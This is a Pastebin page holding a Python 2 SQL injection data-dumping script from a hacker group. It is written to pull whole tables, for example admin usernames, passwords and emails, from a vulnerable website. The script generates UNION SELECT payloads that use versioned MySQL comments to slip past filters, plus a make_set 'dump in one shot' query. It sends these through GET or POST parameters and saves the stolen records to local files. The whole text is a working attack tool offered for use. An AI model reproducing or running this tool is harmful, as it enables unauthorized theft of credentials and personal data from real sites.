Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Table Extractor Script
- #Idea : Ch3rn0by1
- #C0de : VIRkid fb.com/virkid36
- # Greets to team Madleets
- #Beta version
- #Update 09.oct.2014
- ###################################
- import urllib2,re,sys,urllib,argparse
- parser=argparse.ArgumentParser(description="Data Dumping utility ./VIRkid")
- parser.add_argument("Target",help="VULNERABLE url",type=str)
- parser.add_argument('-c','--columns',help="Total Number of Columns",type=int)
- parser.add_argument('-v','--vuln',help="Vulnerable Column",type=int)
- parser.add_argument('-t','--table',help="Table name to extract e.g tbl_admin",type=str)
- parser.add_argument('-n','--column_name',help="comma separated list of columns to extract e.g username,password,email",type=str)
- parser.add_argument('-A','--Apostrophe',help="set to y to add Apostrophe at the start of query ",type=str)
- parser.add_argument('-p','--POST',help="POST SQLi",type=str,default='GET')
- parser.add_argument('-L','--limit',help="Limit Multiples of 5 (5X)",type=int)
- args=parser.parse_args()
- #Banner
- def banner():
- print "\t\t*********************************************"
- print "\t\t* *"
- print "\t\t* Tbl Xtrcat *"
- print "\t\t* .:VIRkid:. *"
- print "\t\t* Usage: python script.py -help *"
- print "\t\t* ali ahmady , pHaNtOm_X ,Ch3rn0by1 *"
- print "\t\t*********************************************"
- #Column Generator
- def colc(num):
- comment="%23"
- num+=1
- cols=','.join([str(i) for i in xrange(1,num)])
- return cols+comment
- #Query Generator
- def qry(cols_t,vulnerable_column,table_name,limits,columns,apos=0):
- if apos=='y':
- un="' and 0 /*!12345union*/ /*!12345select*/ "
- else:
- un=" and 0 /*!12345union*/ /*!12345select*/ "
- t_columns=colc(cols_t)
- t_columns=' '+t_columns
- vcol=vulnerable_column
- dios="make_set(6,@:=0x0a,(/*!12345select*/(1)/*!12345frOm*/(/*!12345select*/ * /*!12345frOm*/ %s limit %d,%d)shit /*!12345where*/@:=make_set(511,@,0x3c6c693e,%s)),@)"%(table_name,limits,5000,columns)
- if cols_t==1 and vcol==1:
- retq=t_columns.replace(' 1%23',dios+'%23')
- elif vcol==1:
- retq=t_columns.replace('%d,'%vcol,dios+',')
- elif vcol==cols_t:
- retq=t_columns.replace(',%d%%23'%vcol,','+dios+'%23')
- else:
- retq=t_columns.replace(',%d,'%vcol,','+dios+',')
- furl=un+retq
- furl=furl.replace(' ','+').replace("'",'%27')
- return furl
- #Record Extractor
- def extractor(u,data):
- recs=[]
- req=urllib2.Request(u,data)
- req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0')
- f=urllib2.urlopen(req).read()
- r=re.findall('<li>,.+..?',f)
- if not r :
- print "\n[+] Table exhausted"
- sys.exit(0)
- x=r[0].replace('<li>','').strip().replace('</div>','').split(',,',999999)
- print "\n[+] Dumped : %d Records"%len(x)
- for each in x:
- each=each.replace(',','::')
- recs.append(each+'\n')
- return recs
- try:
- t_site=args.Target
- #limit count
- c=0
- banner()
- print "\n[*] Target : %s"%t_site
- #Dump File
- dfname='dump-%s-%s-%s.txt'%(args.Target.replace("http://","").split("/",100)[0],args.table,args.column_name)
- print "\n[*] Dump File : ",dfname
- dump_file=open(dfname,'w')
- #GET injection
- if args.POST=='GET':
- while True:
- data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)
- u=t_site+data_dump
- c+=5000
- dump_file.writelines(extractor(u,None))
- if args.limit:
- if c>=args.limit:
- print "\n[+] Limit Reached"
- break
- dump_file.close()
- #POST Injection
- elif args.POST!='GET':
- while True:
- data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)
- u=t_site+data_dump
- Pdata=args.POST
- Pdata=Pdata.replace("Ij3ct",data_dump)
- dump_file.writelines(extractor(u,Pdata))
- c+=5000
- if args.limit:
- if c>=args.limit:
- print "\n[+] Limit Reached"
- break
- dump_file.close()
- except TypeError:
- print "\n[-] Invalid Values OR no values provided for REQUIRED arguments"
- except urllib2.HTTPError, e:
- print "\n[-] %s | Resource %s"%(e.code,e.msg)
- except urllib2.URLError:
- print "\n[-] Unable to Connect to Target"
- except IOError:
- print "[-] Unable to Create dump file"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement